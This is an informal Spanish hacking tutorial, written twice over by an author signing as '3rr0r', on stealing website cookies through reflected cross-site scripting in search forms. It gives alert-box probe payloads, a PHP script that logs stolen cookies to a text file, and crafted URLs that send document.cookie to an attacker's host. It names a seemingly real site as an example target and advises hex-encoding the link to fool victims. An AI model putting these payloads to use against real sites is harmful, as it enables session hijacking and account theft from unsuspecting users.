Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una
web que utilice cookies y tenga un buscador interno.
Cookies
Una cookie es un almacén de información que se guarda en el ordenador del usuario y en
cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador del usuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página
donde se encuentra el buscador, en nuestro caso es buscador.php
Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador,
por ejemplo:
***************************
<script>alert()</script>
***************************
Si salta una alarma al pulsar el botón, significa que ese buscador es vulnerable.
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscar algo como:
******************************************************
<input type="text" name="palabra"> Este sería el Formulario
<input type="submit" name="buscar" value="Buscar"> Este sería el Botón
******************************************************
Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.
Para almacenar las cookies, tenemos dos opciones
1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).
A continuación vamos a crear una pagina en php, este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:
**********************************
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
**********************************
ARCHIVO.TXT
Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
que para ver los resultados tienes que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:
********************************************************************************
http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
********************************************************************************
Editado por 3rr0r
********************************************************************************
Segunda Manera de explicación tal vez os resulte mas útil al no ser tan tecnica.
Que es?
El ataque XSS (Cross Site Scripting) es un error en el filtro de las palabras en el buscador o cualquier sitio ejecutable.
Recuerda que el servidor nececita tener coockies en el panel admin para poder explotar la vulnerabilidad
Ej:http://www.elcisne.org/
1-Saber si es vulnerable
Para saber si una web es vulnerable vamos a escribir en el buscador o en cualquier sitio ejecutable:
<script>alert('Kosak0 Team')</script>
o sin comillas solamente numeros:
<script>alert(1)</script>
Yo recomiendo ponerlo con numeros te van a salir mas alertas que con letras.
Ej: http://www.elcisne.org/buscador.php
2-Ahora vamos a buscar el nombre de los botones
Como? Facil
Selecionamos el buscador que pusimos el script y le damos click derecho y en ver codigo fuente de lo selecionado
Saldra el codigo fuente y buscamos algo asi:
<input name="buscar" class="formbuscador" id="buscar" type="text"> buscador
<input name="Submit" class="botonbuscador" value="BUSCAR" type="submit"> el boton
Lo que nos interesa es lo que dice: " name="buscar" " y " name="Submit" "
3-Sacando cookies
Ahora vamos a crear un archivo XSS.php que sea asi:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
Ahora cuando el usuario sea redicionado a www.tuweb.com/XSS.php se le van a copiar las cookies y guardarlas en www.tuweb.com/archivo.txt
Como hacemos para que caiga? pues redicionandole.
Codigo:
http://www.WEBVULNERABLE.com/buscador.php?Submit=<script>window.location=
'http://www.tuweb.com/XSS.php?cookie='+document.cookie;</script>&buscar=;
Ahora si os fijais donde dice buscar seria donde tendriamos que poner input name="Submit" el boton este que dice "Submit" y ahora abajo lo mismo
Recuerda cambiar tambien " www.WEBVULNERABLE.com/BUSCADOR.php " eso ya que en webs es diferente.
Tambien podriamos encriptar el codigo de arriba en hexadecimal para que sea más creible
Y eso es todo, by 3rr0r
